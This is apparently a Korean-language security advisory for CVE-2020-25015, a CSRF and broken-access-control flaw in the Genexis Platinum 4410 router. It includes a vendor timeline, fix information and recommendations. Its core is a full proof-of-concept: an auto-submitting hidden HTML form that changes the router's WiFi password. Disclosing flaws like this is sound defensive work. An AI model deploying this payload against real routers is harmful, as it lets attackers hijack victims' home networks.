Genexis Platinum 4410 홈 라우터 버전 2.1(소프트웨어 버전 P4410-V2-1.28)을 테스트하는 동안 라우터가 Broken Access Control 및 CSRF에 취약하다는 것을 알 수 있었습니다.
CVE ID: CVE-2020-25015
요약
Platinum 4410은 가정에서 일반적으로 사용되는 Genexis의 소형 라우터입니다. 하드웨어 버전 V2.1 – 소프트웨어 버전 P4410-V2-1.28은 WIFI 액세스 포인트의 비밀번호를 원격으로 변경하기 위해 결합될 수 있는 Broken Access Control 및 CSRF에 취약한 것으로 밝혀졌습니다.
CSRF에 대한 자세한 내용은 이 문서를 참조하십시오.
영향
공격자는 피해자에게 링크를 보낼 수 있으며, 취약한 라우터에서 설정된 WIFI 네트워크에 연결되어 있는 동안 클릭하면 CSRF 익스플로잇을 통해 WIFI 액세스 포인트의 비밀번호가 변경됩니다. 라우터도 Broken Access Control에 취약하므로 피해자가 라우터의 웹 기반 설정 페이지(192.168.1.1)에 로그인할 필요가 없으므로 기본적으로 원클릭 해킹이 됩니다.
취약점
이상적으로는 CSRF 공격이 성공하려면 피해자가 공격을 받고 있는 응용 프로그램(이 경우 192.168.1.1의 웹 기반 설정 페이지)에 로그인해야 하기 때문에 이 공격이 문제가 됩니다. 라우터 설정 페이지는 사용자 세션을 자동으로 종료합니다. 또한 고객이 라우터 설정 페이지도 방문하는 경우는 거의 없습니다. 다만, 신고 당시 최신 펌웨어 버전의 접근제어 취약점이 깨져 인증되지 않은 상대방도 비밀번호 변경 요청을 보낼 수 있다.
따라서 이 펌웨어 버전의 CSRF 및 Broken Access Control 취약점을 결합하여 공격자는 다음 코드로 HTML 문서를 생성하고 사용자가 제출하도록 유인할 수 있습니다.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
<input type="hidden" name="wlEnbl" value="ON" />
<input type="hidden" name="hwlKeys0" value="" />
<input type="hidden" name="hwlKeys1" value="" />
<input type="hidden" name="hwlKeys2" value="" />
<input type="hidden" name="hwlKeys3" value="" />
<input type="hidden" name="hwlgMode" value="9" />
<input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
<input type="hidden" name="hwlEnbl" value="1" />
<input type="hidden" name="hWPSMode" value="1" />
<input type="hidden" name="henableSsid" value="1" />
<input type="hidden" name="hwlHide" value="0" />
<input type="hidden" name="isInWPSing" value="0" />
<input type="hidden" name="WpsConfModeAll" value="7" />
<input type="hidden" name="WpsConfModeNone" value="0" />
<input type="hidden" name="hWpsStart" value="0" />
<input type="hidden" name="isCUCSupport" value="0" />
<input type="hidden" name="SSIDPre" value="N/A" />
<input type="hidden" name="bwControlhidden" value="0" />
<input type="hidden" name="ht_bw" value="1" />
<input type="hidden" name="wlgMode" value="b,g,n" />
<input type="hidden" name="wlChannel" value="0" />
<input type="hidden" name="wlTxPwr" value="1" />
<input type="hidden" name="wlSsidIdx" value="0" />
<input type="hidden" name="SSID_Flag" value="0" />
<input type="hidden" name="wlSsid" value="JINSON" />
<input type="hidden" name="wlMcs" value="33" />
<input type="hidden" name="bwControl" value="1" />
<input type="hidden" name="giControl" value="1" />
<input type="hidden" name="enableSsid" value="on" />
<input type="hidden" name="wlAssociateNum" value="32" />
<input type="hidden" name="wlSecurMode" value="WPAand11i" />
<input type="hidden" name="wlPreauth" value="off" />
<input type="hidden" name="wlNetReauth" value="1" />
<input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
<input type="hidden" name="cb_enablshowpsw" value="on" />
<input type="hidden" name="wlWpaGtkRekey" value="" />
<input type="hidden" name="wlRadiusIPAddr" value="" />
<input type="hidden" name="wlRadiusPort" value="" />
<input type="hidden" name="wlRadiusKey" value="" />
<input type="hidden" name="wlWpa" value="TKIPAES" />
<input type="hidden" name="wlKeyBit" value="64" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="WpsActive" value="0" />
<input type="hidden" name="wpsmode" value="ap-pbc" />
<input type="hidden" name="pinvalue" value="" />
<input type="hidden" name="Save_Flag" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
피해자가 영향을 받는 라우터에서 설정한 WiFi 액세스 포인트에 연결되어 있는 한 액세스 포인트의 비밀번호는 아래 동영상과 같이 변경됩니다.
타임라인
- 2020년 8월 28일 Genexis 팀에 보고된 취약점
- 2020년 9월 14일 수정 사항이 포함된 펌웨어 릴리스를 팀에서 확인했습니다.
권장사항
- Genexis 팀에 따르면 고객은 최신 펌웨어에 액세스하려면 ISP에 문의해야 합니다.
- 펌웨어를 업그레이드할 수 없는 경우 더 안전한 라우터를 사용하세요.
참조
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25015
- https://nvd.nist.gov/vuln/detail/CVE-2020-25015